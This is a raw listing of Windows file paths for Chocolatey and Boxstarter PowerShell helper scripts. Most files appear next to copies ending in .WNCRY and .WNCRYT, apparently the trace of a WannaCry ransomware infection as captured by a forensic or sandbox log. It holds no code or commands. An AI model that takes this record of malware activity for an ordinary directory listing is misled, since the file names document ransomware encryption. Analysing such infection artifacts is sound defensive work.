C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRY
C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd
C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1
C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1
C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1
C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1
C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1
C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1
C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRYT
C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRY
C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRY
